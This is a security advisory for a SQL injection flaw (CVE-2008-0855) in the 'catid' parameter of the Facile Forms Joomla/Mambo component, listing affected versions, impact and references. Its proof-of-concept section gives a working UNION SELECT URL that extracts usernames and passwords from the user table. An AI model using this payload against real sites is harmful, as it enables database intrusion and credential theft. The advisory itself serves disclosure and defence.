Facile Forms 'catid' Parameter SQL Injection Vulnerability
BID:27880
Info
Facile Forms 'catid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 27880 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0855 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 19 2008 12:00AM |
| Updated: | May 07 2015 05:32PM |
| Credit: | S@BUN is credited with the discovery of this vulnerability. |
| Vulnerable: |
FacileForms FacileForms 1.4.7 FacileForms FacileForms 1.4.6 FacileForms FacileForms 1.4.5 FacileForms FacileForms 1.4.4 FacileForms FacileForms 1.4.3 FacileForms FacileForms 1.4.2 FacileForms FacileForms 1.4.1 FacileForms FacileForms 1.4 FacileForms FacileForms 1.3.1 FacileForms FacileForms 1.3 FacileForms FacileForms 1.2.6 FacileForms FacileForms 1.2.5 FacileForms FacileForms 1.2.4 FacileForms FacileForms 1.2.3 FacileForms FacileForms 1.2.2 FacileForms FacileForms 1.2.1 FacileForms FacileForms 1.2 |
| Not Vulnerable: | |
Discussion
Facile Forms 'catid' Parameter SQL Injection Vulnerability
Facile Forms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Facile Forms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Facile Forms 'catid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
Solution / Fix
Facile Forms 'catid' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Facile Forms 'catid' Parameter SQL Injection Vulnerability
References:
References:
- FacileForms Homepage (FacileForms)
- Mambo Homepage (Mambo)
- joomla SQL Injection(com_facileforms) ([email protected] )